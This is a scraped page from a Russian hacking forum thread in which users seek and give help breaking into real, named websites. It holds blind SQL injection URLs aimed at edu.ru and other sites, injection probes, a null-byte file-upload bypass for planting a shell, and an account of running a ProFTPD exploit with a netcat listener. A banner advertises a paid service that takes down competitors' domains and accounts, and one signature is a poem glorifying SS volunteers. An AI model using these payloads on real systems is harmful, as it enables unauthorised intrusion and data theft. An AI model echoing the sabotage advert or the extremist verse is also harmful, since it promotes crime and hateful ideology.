УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1954 из 2438

1954

Опции темы

Поиск в этой теме

Опции просмотра

#19531

06.02.2012, 21:51

nemaniak

Участник форума

Регистрация: 10.06.2008

Сообщений: 201

Провел на форуме:
1174919

Репутация: 229

Реально ли как-то обойти такого рода функцию проверки расширений файлов и залить скажем исполняемый файл?

[PHP]
PHP:
[COLOR="#000000"]if(!empty($upload)){

$errore='';

for($i=1;$i[COLOR="#007700"]

#19532

06.02.2012, 22:15

james00x

Guest

Сообщений: n/a

Провел на форуме:
2110

Репутация: 0

Привет, нашел в сервер

220 ProFTPD 1.3.2e Server (ProFTPD)

Система UNIX, ну вот ехploit нашел такой www.exploit-db.com/exploits/15449/

У меня ест ТП-Линк - я там поставил виртуал сервер

ID Service Ports IP Address Protocol Status

1 45295 192.168.1.100 ALL Enabled

чтобы работала порт, тогда с netcat открыл тот порт через cmd.

C:\nc>nc -lvp 45295

listening on [any] 45295 ...

ладно тогда открываю новы cmd и запускаю перл ехплоит.

Ничего не происходит, я все сделал правильна? Если я чекаю тот порт например, тогда он закрывается, показывает кто чекал.

Если все сделал правильно тогда проста там все ок?

#19533

06.02.2012, 22:41

trololoman96

Guest

Сообщений: n/a

Провел на форуме:
29020

Репутация: 55

Цитата:

Сообщение от None

Здравствуйте!
Ломанул булку, шелл залить понятия как не имею.
Слышал про стили, но не могу найти шелла в формате xml.
Помогите пжлста, наведите хотя бы на ссылку какую нибудь. Заранее благодарен!
Версия булки 4.0.х
Пост пжлста не удаляйте!

первое что попалось - http://www.youtube.com/watch?v=k9xe55gq2fc

уверен, на ачате есть еще способы, стоит только посмотреть внимательней

Цитата:

Сообщение от None

Никак дальше union+select не хочет выполнятся.

как вариант можно крутить как слепую инъекцию

Код:

Code:
http://www.edu.ru/index.php?page_id=50&op=word&wid=509+and+substring%28version%28%29,1,1%29=5--+

#19534

06.02.2012, 23:06

Unknown

Guest

Сообщений: n/a

Провел на форуме:
28346

Репутация: 5

Цитата:

Сообщение от None

как вариант можно крутить как слепую инъекцию

Код:

Code:
http://www.edu.ru/index.php?page_id=50&op=word&wid=509+and+substring%28version%28%29,1,1%29=5--+

Цитата:

Сообщение от None

http://www.edu.ru/index.php?page_id=50&op=word&wid=509++and+555=if%2 8ord%28lower%28mid%28%28select+table_name+from+inf ormation_schema.tables+limit+0,1%29,1,1%29%29%29%3 E=1,555,777%29--+

на слепую ругаеться, видимо слишком длинные запросы не проходят.

#19535

07.02.2012, 12:41

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Код:

Code:
http://forum.prodom.ru/viewtopic.php?p=3805'

не выходит раскрутить.

#19536

07.02.2012, 12:46

Ereee

Guest

Сообщений: n/a

Провел на форуме:
102354

Репутация: 267

http://forum.prodom.ru/viewtopic.php?p=3805/**/and/**/1=1/* true

http://forum.prodom.ru/viewtopic.php?p=3805/**/and/**/1=0/* true

Думаю нет скульи.

#19537

07.02.2012, 13:52

infoseller

Guest

Сообщений: n/a

Провел на форуме:
49472

Репутация: 0

www.ctgroup.kz/?op=mi=node_2566=,view_2599

дальше одного столбца не продвинулся что не так?

#19538

07.02.2012, 14:05

Ereee

Guest

Сообщений: n/a

Провел на форуме:
102354

Репутация: 267

Цитата:

Сообщение от infoseller

infoseller said:
www.ctgroup.kz/?op=mi=node_2566=,view_2599
дальше одного столбца не продвинулся
что не так?

Там нет инъекции.

#19539

07.02.2012, 14:18

HAXTA4OK

Reservists Of Antichat - Level 6

Регистрация: 15.03.2009

Сообщений: 560

Провел на форуме:
4358210

Репутация: 2017

Цитата:

Сообщение от Ereee

Ereee said:
Там нет инъекции.

Почему ты так решил?

__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.

#19540

07.02.2012, 14:21

Ereee

Guest

Сообщений: n/a

Провел на форуме:
102354

Репутация: 267

nemaniak, нереально.

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]strrchr[/COLOR][COLOR="#007700"](${[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'_name'[/COLOR][COLOR="#007700"]},[/COLOR][COLOR="#DD0000"]"."[/COLOR][COLOR="#007700"])==[/COLOR][COLOR="#DD0000"]".doc"[/COLOR][/COLOR]

strrchr берет все после точки. Eсли будет shell.php%00.jpg, shell.php.jpg, то на проверку идет:

php%00.jpg

php.jpg

И проверку не пройдет. Как то так.

HAXTA4OK,

http://www.ctgroup.kz/?op=mi=node_2566=,view_2599+and+1=1 false

http://www.ctgroup.kz/?op=mi=node_2566=,view_2599+and+1=0 false

не?

Страница 1954 из 2438

1954

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход